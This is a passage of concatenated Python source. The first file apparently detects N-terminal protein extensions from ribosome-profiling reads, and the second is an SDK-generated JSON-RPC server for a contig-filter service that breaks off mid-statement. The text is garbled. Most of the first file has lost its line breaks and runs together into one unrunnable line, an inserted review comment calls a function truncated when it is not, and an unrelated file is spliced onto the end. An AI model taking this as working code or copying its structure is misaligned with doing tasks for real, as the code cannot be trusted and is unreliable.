#    if (runmode == 'tl' and sign == '+') or (runmode == 'tp' and sign == '-'):
#        tl_list = tl_list[::-1]
#        tl_list = tl_list[1:]

def find_stop(name, start, stop, seq, sign, runmode):
    # Walk codons away from the gene start until the nearest in-frame stop;
    # returns (search_region_start, search_region_stop, codon_list).  If no
    # stop is found the original (start, stop) is returned unchanged.
    tl_list = []
    sr_seq = []

    #if (runmode == 'tl' and sign == '+') or (runmode == 'tp' and sign == '-'):
    if (runmode == 'tl' and sign == '+'):
        seq = seq[::-1]
        for triplet_step in range(len(seq)//3):
            triplet = seq[(3*triplet_step):(3*triplet_step)+3]
            tl_list.append(triplet[::-1])

        triplet_step = 0
        for triplet in tl_list:
            sr_seq.append(triplet)
            if triplet in stop_codons:
                sr_start = stop - (3*triplet_step)-3
                sr_stop = stop
                return(sr_start, sr_stop, sr_seq)
            triplet_step += 1
        return(start, stop, sr_seq)

    #if (runmode == 'tl' and sign == '-') or (runmode == 'tp' and sign == '+'):
    if (runmode == 'tl' and sign == '-'):
        #reverse so the first codon is the one next to the start...
        seq = seq[::-1]
        #step out and reverse each codon to the original (negative) orientation, add to list
        for triplet_step in range((len(seq))//3):
            triplet = seq[(3*triplet_step):(3*triplet_step)+3]
            tl_list.append(triplet[::-1])

        # scan for stop, first stop send the modified sequence out for detection
        # NOTE(review): unlike the '+' branch, triplet_step is NOT reset to 0
        # here — it carries over the final value of the building loop, so the
        # sr_stop arithmetic below may be offset.  Verify against intended
        # behavior before changing.
        for triplet in tl_list:
            sr_seq.append(triplet)
            if triplet in stop_codons:
                sr_start = start
                sr_stop = start + (3*triplet_step)+3
                return(sr_start, sr_stop, sr_seq)
            triplet_step += 1
        return(start, stop, sr_seq)

    return(start, stop, sr_seq)

# NOTE(review): find_starts is TRUNCATED at the end of the visible region —
# the function body continues beyond this chunk.
def find_starts(name, chromo, sign, start, stop, tl_list, runmode):
    # Scan the search-region codons for candidate alternative initiation
    # sites (aTIS); builds per-candidate coordinate records.
    global atis_id_dict
    global coord_dict

    tl_list = tl_list[::-1]
    seq = ''
    if sign == '-':
        for each_codon in tl_list:
            each_codon = each_codon[::-1]
            seq += each_codon
    else:
        for each_codon in tl_list:
            seq += each_codon

    start_coords = {'full':(start+1, stop)}
    #start_coords['full']=(start+1, stop)

    #if (runmode == 'tl' and sign == '+') or (runmode == 'tp' and sign == '-'):
    if (runmode == 'tl' and sign == '+'):
        triplet_step = 0
        for triplet in tl_list:
            #sr_seq += triplet
            if triplet in start_codons:
                sr_seq = ''
                for codon in tl_list[triplet_step:]:
                    sr_seq += codon

                atis_id = ('{}_{}_{}_{}').format(name, triplet, triplet_step, runmode)
                #atis_id = hash(hash_line)

                start_coords = {'atis':{},'sr':{}, 'up':{},
                                'gene':[coord_dict[name]['gene'][0],coord_dict[name]['gene'][1]],
                                'meta':{'name':name, 'chromo':chromo, 'sign': sign,
                                        'region':runmode, 'seq':sr_seq, 'triplet':triplet},
                                'full': (start+1, stop)}

                #calc aTIS
                #+1 for gff format
                sr_start = start + (3*triplet_step) + 1
sr_stop = sr_start + 3 start_coords['atis'] = (sr_start, sr_stop) #calc whole region sr_start = start + (3*triplet_step) + 1 sr_stop = stop start_coords['sr'] = (sr_start, sr_stop) #calc upstream sr_start = start + 1 sr_stop = start + (3*triplet_step) start_coords['up'] = (sr_start, sr_stop) atis_id_dict[atis_id] = start_coords triplet_step += 1 #if (runmode == 'tl' and sign == '-') or (runmode == 'tp' and sign == '+'): if (runmode == 'tl' and sign == '-'): #tl_list = tl_list[::-1] triplet_step = 0 for triplet in tl_list: if triplet in start_codons: rt_step = len(tl_list)-triplet_step sr_seq = '' for codon in tl_list[triplet_step:]: sr_seq += codon atis_id = ('{}_{}_{}_{}').format(name, triplet, triplet_step, runmode) #atis_id = hash(hash_line) start_coords = {'atis':{},'sr':{}, 'up':{}, 'gene':[coord_dict[name]['gene'][0],coord_dict[name]['gene'][1]], 'meta':{'name':name, 'chromo':chromo, 'sign': sign, 'region':runmode, 'seq':sr_seq, 'triplet':triplet}, 'full': (start+1, stop)} #calc atis sr_start = start + (3*rt_step) - 2 sr_stop = start + (3*rt_step) start_coords['atis'] = (sr_start, sr_stop) #calc whole region sr_start = start + 1 sr_stop = start + (3*rt_step) start_coords['sr'] = (sr_start, sr_stop) #calc upstream sr_start = start + (3*rt_step) + 1 sr_stop = stop start_coords['up'] = (sr_start, sr_stop) atis_id_dict[atis_id] = start_coords triplet_step += 1 return(start_coords) def build_search_region(coord_dict, fasta_dict, dsrl): first_pass_dict = {} #make each, if possible for name, deets in coord_dict.items(): chromo = deets['chromo'] if chromo in fasta_dict: sign = deets['sign'] first_pass_dict[name] = {'chromo': chromo, 'sign': sign, 'tl':'', 'gene':'', 'tp':''} for region in ['tl', 'gene', 'tp']: if deets[region]: start = int(deets[region][0]) stop = int(deets[region][1])+1 if sign == '+': first_pass_dict[name][region] = fasta_dict[chromo][start:stop-1] if sign == '-': first_pass_dict[name][region] = rev_comp(fasta_dict[chromo][start:stop]) #use 'gene' 
and default search region lenght to fill in those that are absent for name, deets in first_pass_dict.items(): chromo = deets['chromo'] sign = deets['sign'] for region in ['tl', 'tp']: if not deets[region]: first_pass_dict, coord_dict = use_dsrl(name, region, first_pass_dict, coord_dict) #scan for stops and define regions search_region_dict = {} assign_region_dict = {'tl':{}, 'tp':{}} flanking_region_dict = {'tl':{}, 'tp':{}} for name, deets in first_pass_dict.items(): chromo = deets['chromo'] sign = deets['sign'] search_region_dict[name] = {'chromo': chromo, 'sign': sign, 'tl':'', 'tp':'', 'starts':{'tl':{},'tp':{}}} for region in ['tl', 'tp']: r_start = coord_dict[name][region][0] r_stop = coord_dict[name][region][1] sr_start, sr_stop, sr_seq = find_stop(name, r_start, r_stop, deets[region], sign, region) search_region_dict[name]['starts'][region] = find_starts(name, chromo, sign, sr_start, sr_stop, sr_seq, region) if chromo not in assign_region_dict[region]: assign_region_dict[region][chromo]={} if chromo not in flanking_region_dict[region]: flanking_region_dict[region][chromo]={} for nt in range(sr_start, sr_stop+1): if nt not in assign_region_dict[region][chromo]: gene_set = set() gene_set.add(name) assign_region_dict[region][chromo][nt] = gene_set else: assign_region_dict[region][chromo][nt].add(name) for f_nt in range(r_start, r_stop+1): if f_nt not in range(sr_start, sr_stop+1): if f_nt not in flanking_region_dict[region][chromo]: gene_set = set() gene_set.add(name) flanking_region_dict[region][chromo][f_nt] = gene_set else: flanking_region_dict[region][chromo][f_nt].add(name) return(search_region_dict, assign_region_dict, flanking_region_dict) def convert_to_sam(each_sample): if each_sample[-4:] == '.bam': new_name = each_sample.split('.bam')[0]+'.sam' monolog = ('\tLoading bam file {}.\n').format(str(each_sample)) print(monolog) bashCommand = ('samtools view -h -o {} {}').format(new_name, each_sample) 
output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True)) return(new_name) if each_sample[-4:] == '.sam': return(each_sample) def assign_reads(uid, chromo, start, stop, sign, runmode): global sample_dict global search_region_dict global assign_region_dict global flanking_region_dict global filter_nt hit_ct = 0 filter_region = filter_nt[chromo] for region in ['tl','tp']: for nt in range(start, stop+1): if nt not in filter_region: if nt in assign_region_dict[region][chromo]: gene_set = assign_region_dict[region][chromo][nt] for gene in gene_set: if sign == search_region_dict[gene]['sign']: hit_ct += 1 if gene not in sample_dict[runmode]['sr']: uid_set = set() uid_set.add(uid) sample_dict[runmode]['sr'][gene] = {} sample_dict[runmode]['sr'][gene][nt] = uid_set else: if nt not in sample_dict[runmode]['sr'][gene]: uid_set = set() uid_set.add(uid) sample_dict[runmode]['sr'][gene][nt] = uid_set else: sample_dict[runmode]['sr'][gene][nt].add(uid) else: if nt in flanking_region_dict[region][chromo]: gene_set = flanking_region_dict[region][chromo][nt] for gene in gene_set: if sign == search_region_dict[gene]['sign']: hit_ct += 1 if gene not in sample_dict[runmode]['fl']: uid_set = set() uid_set.add(uid) sample_dict[runmode]['fl'][gene] = {} sample_dict[runmode]['fl'][gene][nt] = uid_set else: if nt not in sample_dict[runmode]['fl'][gene]: uid_set = set() uid_set.add(uid) sample_dict[runmode]['fl'][gene][nt] = uid_set else: sample_dict[runmode]['fl'][gene][nt].add(uid) return(hit_ct) def load_reads(convert_name, chromosome_set, search_region_dict, assign_region_dict, flanking_region_dict, runmode): global sample_bam_dict #TODO: Future version - Basic version only extracts 28M reads, make this better sam_file = open(convert_name) ct = 0 hit_ct = 0 header_list = [] for line in sam_file: if line[0] == '@': header_list.append(line) else: ct += 1 cigar = line.split('\t')[5] chromo = line.split('\t')[2] if 'chr' in chromo: chromo = 
chromo.split('chr')[1] if chromo in chromosome_set: uid = line.split('\t')[0]+'~'+str(ct) flag = line.split('\t')[1] start = int(line.split('\t')[3]) sign = strand_to_sign[unpackbits(np.array([int(flag)]))[0][4]] sequence = line.split('\t')[9] process, n_cigar, n_sequence = parse_cigar(cigar, sequence) stop = start + len(n_sequence) new_hits = assign_reads(uid, chromo, start, stop, sign, runmode) hit_ct += new_hits if new_hits > 0: sample_bam_dict[runmode][uid] = line if '28M' in cigar and runmode == 'RPF': if chromo in chromosome_set: if process: if sign == '-': psite = stop - 13 p_seq = n_sequence[-13] else: psite = start + 12 p_seq = n_sequence[12] mapq = line.split('\t')[4] mid = str(line.split('\t')[6:9]).replace('[','').replace(']','').replace(',','\t').replace("'",'').replace(' ','') qual = str(line.split('\t')[10:]).replace('[','').replace(']','').replace(',','\t').replace("'",'').replace(' ','') new_hits = assign_reads(uid, chromo, psite, psite, sign, 'psites') hit_ct += new_hits new_line = ('{uid}\t{flag}\t{chromo}\t{psite}\t{mapq}\t1M\t{mid}\t{p_seq}\t{qual}\n').format(uid=uid, flag=flag, chromo=chromo, psite=psite, mapq=mapq, mid=mid, p_seq=p_seq, qual=qual) sample_bam_dict['psites'][uid]= new_line sam_file.close() sample_bam_dict['header'] = header_list return() def output_bam(output_dir, header_list, new_bam_dict): file_name = ('{}.sam').format(output_dir) new_sam_file = open(file_name, 'w') for header in header_list: new_sam_file.write(header) for uid, line in new_bam_dict.items(): if uid != 'header': new_sam_file.write(line) new_sam_file.close() print('\tConverting to bam file\n') bashCommand = ('samtools view -Sb {sample_name}.sam > {sample_name}_unsorted.bam').format(sample_name=args.output_file) output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True)) bashCommand = ('samtools sort -o {sample_name}.bam {sample_name}_unsorted.bam').format(sample_name=args.output_file) 
output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True)) bashCommand = ('samtools index {sample_name}.bam').format(sample_name=args.output_file) output_handler(subprocess.check_output([bashCommand],stderr=subprocess.STDOUT,shell=True)) def output_bed(name, atis_id, tis_scores, atis_sample_dict, outputfile): for each_sample, atis_id_dict in atis_sample_dict.items(): score = np.median(tis_scores) if atis_id in atis_id_dict: check_name = atis_id_dict[atis_id]['meta']['name'] chromo = atis_id_dict[atis_id]['meta']['chromo'] sign = atis_id_dict[atis_id]['meta']['sign'] seq = atis_id_dict[atis_id]['meta']['seq'] triplet = atis_id_dict[atis_id]['meta']['triplet'] start, stop = atis_id_dict[atis_id]['sr'] if name != check_name: print('atis name disagreement', name, check_name, atis_id) else: outline = ('{chromo}\t{start}\t{stop}\t{name}_{triplet}_{seq}_nte\t{score}\t{sign}\n').format(chromo=chromo, start=start, stop=stop, name=name, seq=seq, triplet=triplet, score=score, sign=sign) outputfile.write(outline) return() print('not found', name, atis_id, score) def parse_samples(sample_list): name_dict = {} if sample_list: if len(sample_list)%3!= 0: print('Error: each sample requires a Name, RPF bam file, and RNA bam file.') else: for i in range(int(len(sample_list)/3)): name_dict[sample_list[i*3]]=[sample_list[(i*3)+1], sample_list[(i*3)+2]] return(name_dict) def eval_atis(atis_id, athird): global atis_id_dict global score_dict global eval_atis_dict global quantified_search_regions_dict process_ct = 0 for each_sample in args.sample_list: if atis_id in atis_id_dict[each_sample]: if atis_id_dict[each_sample][atis_id]['meta']['region'] == 'tl': name = atis_id_dict[each_sample][atis_id]['meta']['name'] if name in quantified_search_regions_dict[each_sample]: print(quantified_search_regions_dict[each_sample][name].keys()) if atis_id in quantified_search_regions_dict[each_sample][name]: if 
quantified_search_regions_dict[each_sample][name][atis_id]['sr']['psites'][0] >= minimum_reads: process_ct += 1 if (process_ct/float(len(args.sample_list)) > 0.5) and process_ct >= 2: for each_sample in args.sample_list: atis_details = quantified_search_regions_dict[each_sample][name][atis_id] if atis_id not in eval_atis_dict: eval_atis_dict[atis_id] = {'rte':[], 'rsm':[], 'tis_score':[], 'pval':[], 'atis_psites':[], 'sr_psites':[], 'up_psites':[]} rte = (atis_details['sr']['RPF'])/float(max(1, atis_details['sr']['RNA'])) rsm = (atis_details['atis']['psites'][0])/float(max(1, sum(atis_details['up']['psites']))) weight = (atis_details['atis']['psites'][0]/float(atis_details['full']['psites'][0])) eval_atis_dict[atis_id]['tis_score'].append(rte * rsm * weight) eval_atis_dict[atis_id]['pval'].append(stats.binom_test([atis_details['sr']['psites'][0], atis_details['sr']['psites'][1] + atis_details['sr']['psites'][2]], p=athird)) if np.median(eval_atis_dict[atis_id]['pval']) <= 0.05 and ((atis_details['sr']['psites'][0] >= atis_details['sr']['psites'][1]) and (atis_details['sr']['psites'][0] >= atis_details['sr']['psites'][2])): output_bed(name, atis_id, eval_atis_dict[atis_id]['tis_score'], atis_id_dict, nte_potential_file) if name not in score_dict: score_dict[name] = {} if atis_id not in score_dict[name]: score_dict[name][atis_id] = (eval_atis_dict[atis_id]['tis_score']) else: print('atis_id error', atis_id) 1/0 if __name__ == '__main__': atis_id_dict = {} filter_nt = {} os_mkdir(args.output_file) if args.load_reads: print('Starting nteseq ... ') name_dict = parse_samples(args.sample_list) #2 parse fasta print('Parsing fasta file... 
') fasta_dict = parse_fasta(args.fa_file) #1 parse_gff print('Parsing GFF file for genes with transcript leaders...') coord_dict, chromosome_set = parse_gff(gff_file, gene_tag, tl_tag, tp_tag, min_tl, min_3p, mask_tl, mask_3p) #3 for each gene get fasta of upstream, scan for first stop codon, all start codons print('Defining NTE search regions ...') search_region_dict, assign_region_dict, flanking_region_dict = build_search_region(coord_dict, fasta_dict, dsrl) #4 load bam, sam file print('Loading reads from bam/sam files into candidate regions... ') sample_dict = {'RNA':{'sr':{}, 'fl':{}, 'uid':{}}, 'RPF':{'sr':{}, 'fl':{}, 'uid':{}}, 'psites':{'sr':{}, 'fl':{}, 'uid':{}}} sample_bam_dict = {'RNA':{}, 'RPF':{}, 'psites':{}, 'header':[]} #for i in range(len(name_dict)+1): jobs = [] for each_sample, RPF_RNA_pair in name_dict.items(): print('Loading sample: ' + str(each_sample)) RPF_name, RNA_name = RPF_RNA_pair convert_rpf_name = convert_to_sam(RPF_name) convert_rna_name = convert_to_sam(RNA_name) load_reads(convert_rpf_name, chromosome_set, search_region_dict, assign_region_dict, flanking_region_dict, 'RPF') load_reads(convert_rna_name, chromosome_set, search_region_dict, assign_region_dict, flanking_region_dict, 'RNA') #TODO: future versions multiprocess read loading #p = multiprocessing.Process(target=load_reads, args=(convert_rpf_name, chromosome_set, search_region_dict, assign_region_dict, flanking_region_dict, 'RPF',)) #jobs.append(p) #p = multiprocessing.Process(target=load_reads, args=(convert_rna_name, chromosome_set, search_region_dict, assign_region_dict, flanking_region_dict, 'RNA',)) #jobs.append(p) #p.start() #p.join() # print('generating P-site bam files ... 
') output_bam(args.output_file, sample_bam_dict['header'], sample_bam_dict['psites']) print('Writing data out:') resource_pickle_name = ('{}_sample_dict.p').format(args.output_file) print('\t' + resource_pickle_name) with open(resource_pickle_name, 'wb') as file: pickle.dump(sample_dict, file) # print('loading reads and p-sites into candidate regions ... ') quantified_search_regions_dict = {} rep_psite_dict = sample_dict['psites']['sr'] rep_RPF_dict = sample_dict['RPF']['sr'] rep_RNA_dict = sample_dict['RNA']['sr'] for atis_id, etc in atis_id_dict.items(): name = etc['meta']['name'] sign = etc['meta']['sign'] if sign == '+': gene_start_codon = etc['gene'][0] else: gene_start_codon = etc['gene'][1] if name in rep_psite_dict: sr_psites_dict = rep_psite_dict[name] sr_RPF_dict = rep_psite_dict[name] sr_RNA_dict = rep_psite_dict[name] if name not in quantified_search_regions_dict: quantified_search_regions_dict[name] = {} if atis_id not in quantified_search_regions_dict[name]: quantified_search_regions_dict[name][atis_id] = {'atis':{}, 'sr': {}, 'up':{}, 'full':{}} for atis_region in ['atis', 'sr', 'up', 'full']: quantified_search_regions_dict[name][atis_id][atis_region] = {'psites':{}, 'RNA':0, 'RPF':0} quantified_search_regions_dict[name][atis_id][atis_region]['psites'] = [0,0,0] for nt in range(etc[atis_region][0], etc[atis_region][1]+1): if nt in sr_psites_dict: psite_ct = len(sr_psites_dict[nt]) rpf_ct = len(sr_RPF_dict[nt]) rna_ct = len(sr_RNA_dict[nt]) if sign == '+': reading_frame = (nt - gene_start_codon - 1 ) % 3 else: reading_frame = (gene_start_codon - nt) % 3 quantified_search_regions_dict[name][atis_id][atis_region]['psites'][reading_frame] += psite_ct quantified_search_regions_dict[name][atis_id][atis_region]['RPF'] += rpf_ct quantified_search_regions_dict[name][atis_id][atis_region]['RNA'] += rna_ct print('Writing data out:') resource_pickle_name = ('{}_quantified_search_regions_dict.p').format(args.output_file) print('\t' + resource_pickle_name) with 
open(resource_pickle_name, 'wb') as file: pickle.dump(quantified_search_regions_dict, file) resource_pickle_name = ('{}_atis_id_dict.p').format(args.output_file) print('\t' + resource_pickle_name) with open(resource_pickle_name, 'wb') as file: pickle.dump(atis_id_dict, file) if args.evaluate: union_set = set() quantified_search_regions_dict = {'union':{}} sample_dict = {} atis_id_dict = {} print('Loading data: ') for each_sample in args.sample_list: pickle_out = ('{}_quantified_search_regions_dict.p').format(each_sample) print('\t' + pickle_out) quantified_search_regions_dict[each_sample] = pickle.load(open(pickle_out, 'rb')) pickle_out = ('{}_sample_dict.p').format(each_sample) print('\t' + pickle_out) sample_dict[each_sample] = pickle.load(open(pickle_out, 'rb')) pickle_out = ('{}_atis_id_dict.p').format(each_sample) print('\t' + pickle_out) atis_id_dict[each_sample] = pickle.load(open(pickle_out, 'rb')) for atis_id, _etc in atis_id_dict[each_sample].items(): union_set.add(atis_id) athird = float(1/3) eval_atis_dict = {} score_dict = {} nte_candidate_file_name = ('{}.bed').format(args.output_file) nte_candidate_file = open(nte_candidate_file_name, 'w') nte_potential_file_name = ('{}_potential.bed').format(args.output_file) nte_potential_file = open(nte_potential_file_name, 'w') print('Evaluating candidate NTE events... 
') for atis_id in union_set: eval_atis(atis_id, athird) for name, atis_scores in score_dict.items(): best_score = 0 best_set = [0,0,0] best_atis = '' for atis_id, atis_score in atis_scores.items(): if len(atis_score) > 0: calc_score = sum(atis_score) if best_atis != atis_id: if calc_score > best_score: best_score = calc_score best_atis = atis_id best_set = atis_score if calc_score == best_score: if np.median(atis_score) > np.median(best_set): best_score = calc_score best_atis = atis_id best_set = atis_score if best_atis != '': output_bed(name, best_atis, best_score, atis_id_dict, nte_candidate_file) nte_potential_file.close() nte_candidate_file.close() print('Completed evaluation of candidate NTE events results saved in ', nte_candidate_file_name)
# ==== imramboContigFilterServer.py (separate file concatenated below) ====
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# KBase-SDK-generated JSON-RPC WSGI server for the imramboContigFilter
# module: reads deployment config from the environment, registers the Impl
# methods with a jsonrpcbase service, and dispatches authenticated requests.
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server

import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
    JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError

from biokbase import log
from imramboContigFilter.authclient import KBaseAuth as _KBaseAuth

try:
    from ConfigParser import ConfigParser  # py2
except ImportError:
    from configparser import ConfigParser  # py3

# Environment-variable names pointing at the deployment config.
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'

# Note that the error fields do not match the 2.0 JSONRPC spec


def get_config_file():
    """Path of the deployment config file, or None if not configured."""
    return environ.get(DEPLOY, None)


def get_service_name():
    """Service name from the environment, or None."""
    return environ.get(SERVICE, None)


def get_config():
    """Load this service's section of the deployment config as a dict."""
    if not get_config_file():
        return None
    retconfig = {}
    config = ConfigParser()
    config.read(get_config_file())
    for nameval in config.items(get_service_name() or 'imramboContigFilter'):
        retconfig[nameval[0]] = nameval[1]
    return retconfig

config = get_config()

from imramboContigFilter.imramboContigFilterImpl import imramboContigFilter  # noqa @IgnorePep8
impl_imramboContigFilter = imramboContigFilter(config)


class JSONObjectEncoder(json.JSONEncoder):
    """JSON encoder that also handles sets, frozensets, and objects
    exposing a toJSONable() method."""

    def default(self, obj):
        if isinstance(obj, set):
            return list(obj)
        if isinstance(obj, frozenset):
            return list(obj)
        if hasattr(obj, 'toJSONable'):
            return obj.toJSONable()
        return json.JSONEncoder.default(self, obj)


class JSONRPCServiceCustom(JSONRPCService):
    """jsonrpcbase service variant that threads a MethodContext (ctx)
    through every method call and wraps unexpected exceptions."""

    def call(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in a JSON
        string or None if there is none.

        Arguments:
        jsondata -- remote method call in jsonrpc format
        """
        result = self.call_py(ctx, jsondata)
        if result is not None:
            return json.dumps(result, cls=JSONObjectEncoder)

        return None

    def _call_method(self, ctx, request):
        """Calls given method with given params and returns it value."""
        method = self.method_data[request['method']]['method']
        params = request['params']
        result = None
        try:
            if isinstance(params, list):
                # Does it have enough arguments?
                if len(params) < self._man_args(method) - 1:
                    raise InvalidParamsError('not enough arguments')
                # Does it have too many arguments?
                if(not self._vargs(method) and len(params) >
                        self._max_args(method) - 1):
                    raise InvalidParamsError('too many arguments')

                result = method(ctx, *params)
            elif isinstance(params, dict):
                # Do not accept keyword arguments if the jsonrpc version is
                # not >=1.1.
                if request['jsonrpc'] < 11:
                    raise KeywordError

                result = method(ctx, **params)
            else:  # No params
                result = method(ctx)
        except JSONRPCError:
            raise
        except Exception as e:
            # log.exception('method %s threw an exception' % request['method'])
            # Exception was raised inside the method.
            # Re-wrap with the server-side stack trace attached for the client.
            newerr = JSONServerError()
            newerr.trace = traceback.format_exc()
            if len(e.args) == 1:
                newerr.data = repr(e.args[0])
            else:
                newerr.data = repr(e.args)
            raise newerr
        return result

    def call_py(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in
        python object format or None if there is none.

        This method is same as call() except the return value is a python
        object instead of JSON string. This method is mainly only useful for
        debugging purposes.
        """
        rdata = jsondata
        # we already deserialize the json string earlier in the server code, no
        # need to do it again
        # try:
        #     rdata = json.loads(jsondata)
        # except ValueError:
        #     raise ParseError

        # set some default values for error handling
        request = self._get_default_vals()

        if isinstance(rdata, dict) and rdata:
            # It's a single request.
            self._fill_request(request, rdata)
            respond = self._handle_request(ctx, request)

            # Don't respond to notifications
            if respond is None:
                return None

            return respond
        elif isinstance(rdata, list) and rdata:
            # It's a batch.
            requests = []
            responds = []

            for rdata_ in rdata:
                # set some default values for error handling
                request_ = self._get_default_vals()
                self._fill_request(request_, rdata_)
                requests.append(request_)

            for request_ in requests:
                respond = self._handle_request(ctx, request_)
                # Don't respond to notifications
                if respond is not None:
                    responds.append(respond)

            if responds:
                return responds

            # Nothing to respond.
            return None
        else:
            # empty dict, list or wrong type
            raise InvalidRequestError

    def _handle_request(self, ctx, request):
        """Handles given request and returns its response."""
        if 'types' in self.method_data[request['method']]:
            self._validate_params_types(request['method'], request['params'])

        result = self._call_method(ctx, request)

        # Do not respond to notifications.
        if request['id'] is None:
            return None

        respond = {}
        self._fill_ver(request['jsonrpc'], respond)
        respond['result'] = result
        respond['id'] = request['id']

        return respond


class MethodContext(dict):
    """Per-request context dict (user, token, provenance, call id) that the
    Impl methods receive; also proxies logging to the server logger."""

    def __init__(self, logger):
        self['client_ip'] = None
        self['user_id'] = None
        self['authenticated'] = None
        self['token'] = None
        self['module'] = None
        self['method'] = None
        self['call_id'] = None
        self['rpc_context'] = None
        self['provenance'] = None
        self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
        self._logger = logger

    def log_err(self, message):
        self._log(log.ERR, message)

    def log_info(self, message):
        self._log(log.INFO, message)

    def log_debug(self, message, level=1):
        # Levels may be symbolic (in _debug_levels) or numeric 1-3, which map
        # onto syslog-style levels 7-9.
        if level in self._debug_levels:
            pass
        else:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            level = level + 6
        self._log(level, message)

    def set_log_level(self, level):
        self._logger.set_log_level(level)

    def get_log_level(self):
        return self._logger.get_log_level()

    def clear_log_level(self):
        self._logger.clear_user_log_level()

    def _log(self, level, message):
        self._logger.log_message(level, message, self['client_ip'],
                                 self['user_id'], self['module'],
                                 self['method'], self['call_id'])

    def provenance(self):
        # If a callback server is available, fetch provenance from it;
        # otherwise fall back to the locally stored provenance.
        callbackURL = os.environ.get('SDK_CALLBACK_URL')
        if callbackURL:
            # OK, there's a callback server from which we can get provenance
            arg_hash = {'method': 'CallbackServer.get_provenance',
                        'params': [],
                        'version': '1.1',
                        'id': str(_random.random())[2:]
                        }
            body = json.dumps(arg_hash)
            response = _requests.post(callbackURL, data=body,
                                      timeout=60)
            response.encoding = 'utf-8'
            if response.status_code == 500:
                if ('content-type' in response.headers and
                        response.headers['content-type'] ==
                        'application/json'):
                    err = response.json()
                    if 'error' in err:
                        raise ServerError(**err['error'])
                    else:
                        raise ServerError('Unknown', 0, response.text)
                else:
                    raise ServerError('Unknown', 0, response.text)
            if not response.ok:
                response.raise_for_status()
            resp = response.json()
            if 'result' not in resp:
                raise ServerError('Unknown', 0,
                                  'An unknown server error occurred')
            return resp['result'][0]
        else:
            return self.get('provenance')


class ServerError(Exception):
    '''
    The call returned an error. Fields:
    name - the name of the error.
    code - the error code.
    message - a human readable error message.
    data - the server side stacktrace.
    '''

    def __init__(self, name, code, message, data=None, error=None):
        super(Exception, self).__init__(message)
        self.name = name
        self.code = code
        self.message = message if message else ''
        self.data = data or error or ''
        # data = JSON RPC 2.0, error = 1.1

    def __str__(self):
        return self.name + ': ' + str(self.code) + '. ' + self.message + \
            '\n' + self.data


def getIPAddress(environ):
    """Best-effort client IP: X-Forwarded-For, then X-Real-IP, then
    REMOTE_ADDR; the proxy headers are honored only when the config does
    not set dont_trust_x_ip_headers."""
    xFF = environ.get('HTTP_X_FORWARDED_FOR')
    realIP = environ.get('HTTP_X_REAL_IP')
    trustXHeaders = config is None or \
        config.get('dont_trust_x_ip_headers') != 'true'

    if (trustXHeaders):
        if (xFF):
            return xFF.split(',')[0].strip()
        if (realIP):
            return realIP.strip()
    return environ.get('REMOTE_ADDR')


class Application(object):
    # Wrap the wsgi handler in a class definition so that we can
    # do some initialization and avoid regenerating stuff over
    # and over

    def logcallback(self):
        self.serverlog.set_log_file(self.userlog.get_log_file())

    def log(self, level, context, message):
        self.serverlog.log_message(level, message, context['client_ip'],
                                   context['user_id'], context['module'],
                                   context['method'], context['call_id'])

    def __init__(self):
        submod = get_service_name() or 'imramboContigFilter'
        self.userlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, changecallback=self.logcallback,
            config=get_config_file())
        self.serverlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, logfile=self.userlog.get_log_file())
        self.serverlog.set_log_level(6)
        self.rpc_service = JSONRPCServiceCustom()
        self.method_authentication = dict()
        # Register each Impl method and its auth requirement.
        self.rpc_service.add(impl_imramboContigFilter.run_imramboContigFilter,
                             name='imramboContigFilter.run_imramboContigFilter',
                             types=[dict])
        self.method_authentication['imramboContigFilter.run_imramboContigFilter'] = 'required'  # noqa
        self.rpc_service.add(impl_imramboContigFilter.run_imramboContigFilter_max,
                             name='imramboContigFilter.run_imramboContigFilter_max',
                             types=[dict])
        self.method_authentication['imramboContigFilter.run_imramboContigFilter_max'] = 'required'  # noqa
        self.rpc_service.add(impl_imramboContigFilter.run_imramboContigFilter_min,
                             name='imramboContigFilter.run_imramboContigFilter_min',
                             types=[dict])
        self.method_authentication['imramboContigFilter.run_imramboContigFilter_min'] = 'required'  # noqa
        self.rpc_service.add(impl_imramboContigFilter.status,
                             name='imramboContigFilter.status',
                             types=[dict])
        authurl = config.get(AUTH) if config else None
        self.auth_client = _KBaseAuth(authurl)

    def __call__(self, environ, start_response):
        # Context object, equivalent to the perl impl CallContext
        ctx = MethodContext(self.userlog)
        ctx['client_ip'] = getIPAddress(environ)
        status = '500 Internal Server Error'

        try:
            body_size = int(environ.get('CONTENT_LENGTH', 0))
        except (ValueError):
            body_size = 0
        if environ['REQUEST_METHOD'] == 'OPTIONS':
            # we basically do nothing and just return headers
            status = '200 OK'
            rpc_result = ""
        else:
            request_body = environ['wsgi.input'].read(body_size)
            try:
                req = json.loads(request_body)
            except ValueError as ve:
                err = {'error': {'code': -32700,
                                 'name': "Parse error",
                                 'message': str(ve),
                                 }
                       }
                rpc_result = self.process_error(err, ctx, {'version': '1.1'})
            else:
                ctx['module'], ctx['method'] = req['method'].split('.')
                ctx['call_id'] = req['id']
                ctx['rpc_context'] = {
                    'call_stack': [{'time': self.now_in_utc(),
                                    'method': req['method']}
                                   ]
                }
                prov_action = {'service': ctx['module'],
                               'method': ctx['method'],
                               'method_params': req['params']
                               }
                ctx['provenance'] = [prov_action]
                try:
                    token = environ.get('HTTP_AUTHORIZATION')
                    # parse out the method being requested and check if it
                    # has an authentication requirement
                    method_name = req['method']
                    auth_req = self.method_authentication.get(
                        method_name, 'none')
                    if auth_req != 'none':
                        if token is None and auth_req == 'required':
                            err = JSONServerError()
                            err.data = (
